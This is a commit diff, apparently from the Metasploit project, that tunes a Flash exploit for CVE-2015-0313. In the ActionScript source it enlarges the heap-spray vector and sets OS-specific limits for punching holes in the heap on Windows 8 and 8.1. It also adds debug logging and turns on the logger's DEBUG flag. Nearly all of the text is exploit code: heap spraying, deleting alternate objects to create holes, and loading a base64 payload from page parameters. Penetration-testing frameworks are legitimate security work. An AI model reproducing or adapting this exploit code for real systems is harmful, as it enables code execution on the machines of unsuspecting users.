Tweak Heap Spray

jvazquez-r7 · jvazquez-r7 · commit 2b4fe96cfdbe · 2015-06-10T10:56:24.000-05:00
diff --git a/data/exploits/CVE-2015-0313/msf.swf b/data/exploits/CVE-2015-0313/msf.swf
diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -23,7 +23,7 @@ import mx.utils.Base64Decoder
 
 public class Exploit extends Sprite
 {
-    private var ov:Vector.<Object> = new Vector.<Object>(80000)
+    private var ov:Vector.<Object> = new Vector.<Object>(120000)
     private var uv:Vector.<uint>
     private var ba:ByteArray = new ByteArray()
     private var worker:Worker
@@ -44,6 +44,16 @@ public class Exploit extends Sprite
     {
         platform = LoaderInfo(this.root.loaderInfo).parameters.pl
         os = LoaderInfo(this.root.loaderInfo).parameters.os
+		Logger.log("od: " + os)
+		var ov_limit:uint
+		if (os == "Windows 8.1" || os == "Windows 8") {
+			ov_limit = 80000
+		} else {
+			ov_limit = 60000
+		}
+		Logger.log("ov: " + ov.length.toString())
+		Logger.log("ov_limit: " + ov_limit.toString())
+		
         var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
         var pattern:RegExp = / /g;
         b64_payload = b64_payload.replace(pattern, "+")
@@ -52,11 +62,13 @@ public class Exploit extends Sprite
 
         ba.length = 0x1000
         ba.shareable = true
+		Logger.log("spray")
         for (var i:uint = 0; i < ov.length; i++) {
             ov[i] = new Vector.<uint>(1014)
             ov[i][0] = 0xdeedbeef
         }
-        for (i = 0; i < ov.length / 2; i += 2) {
+		Logger.log("holes")
+        for (i = 0; i < ov_limit; i += 2) {
 			delete(ov[i])
 		}
         worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
@@ -65,6 +77,7 @@ public class Exploit extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
+		Logger.log('go')
         worker.start()
     }
 
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -32,7 +32,7 @@ package
             payload = p
             platform = pl
             op_system = os
-
+			
             ev = new ExploitVector(uv)
             if (!ev.is_ready()) return
             eba = new ExploitByteArray(platform)
diff --git a/external/source/exploits/CVE-2015-0313/Logger.as b/external/source/exploits/CVE-2015-0313/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 0
+        private static const DEBUG:uint = 1
  
         public static function alert(msg:String):void
         {

Original file line number	Diff line number	Diff line change
`@@ -3,7 +3,7 @@ package`
`3`	`3`	`import flash.external.ExternalInterface`
`4`	`4`
`5`	`5`	`public class Logger {`
`6`		`- private static const DEBUG:uint = 0`
	`6`	`+ private static const DEBUG:uint = 1`
`7`	`7`
`8`	`8`	`public static function alert(msg:String):void`
`9`	`9`	`{`